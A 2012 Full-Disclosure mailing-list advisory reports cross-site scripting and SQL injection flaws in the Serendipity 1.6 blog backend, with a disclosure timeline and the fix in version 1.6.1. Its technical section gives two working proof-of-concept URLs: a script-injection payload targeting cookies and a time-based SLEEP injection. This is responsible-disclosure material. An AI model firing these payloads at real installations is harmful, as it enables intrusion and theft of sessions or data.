
Date: Wed, 9 May 2012 07:58:59 +0200
From: Stefan Schurtz <s.schurtz@...amis.de>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: Serendipity 1.6 Backend Cross-Site Scripting and
 SQL-Injection vulnerability

Advisory: Serendipity 1.6 Backend Cross-Site Scripting and SQL-Injection vulnerability
Advisory ID: KORAMIS-ADV2012-001
Contact: security@...amis.de
Author: Stefan Schurtz
Affected Software: Successfully tested on Serendipity 1.6
Vendor URL: http://www.s9y.org
Vendor Status: fixed

==========================
Vulnerability Description:
==========================

The Serendipity backend is prone to a Cross-Site Scripting and SQL-Injection vulnerability.

==================
Technical Details:
==================

// XSS
http://[target]/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]='"</script><script>alert(document.cookie)</script>

// SQL-Injection
http://[target]/serendipity/serendipity_admin.php?serendipity[adminModule]=plugins&serendipity[plugin_to_conf]=-1' OR SLEEP(10)=0 LIMIT 1--+

=========
Solution:
=========

Upgrade to version 1.6.1

====================
Disclosure Timeline:
====================

21-Apr-2012 - informed developers
22-Apr-2012 - feedback from developer
08-May-2012 - fixed in version 1.6.1

========
Credits:
========

Vulnerabilities found and advisory written by Stefan Schurtz (KORAMIS Security Team).

===========
References:
===========

http://www.koramis.com/advisories/2012/KORAMIS-ADV2012-001.txt
http://blog.s9y.org/archives/240-Serendipity-1.6.1-released.htm

Best regards,
Stefan Schurtz

KORAMIS GmbH

Hauptsitz                    Büro Güdingen
Ensheimer Str. 37       Neumühler Weg 32.1
D - 66386 St. Ingbert   D - 66130 Saarbrücken-Güdingen

Tel.        +49 (0)681 - 968 191 - 23                E-Mail  s.schurtz@...amis.de<mailto:s.schurtz@...amis.de>
Fax        +49 (0)681 - 968 191 - 923   Web      http://www.koramis.de
Handy   +49 (0)151 - 212 520 04

Handelsregister:
Saarbrücken, HBR 33069
Geschäftsführung:
Hans-Peter Fichtner, Michael Krammel


Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
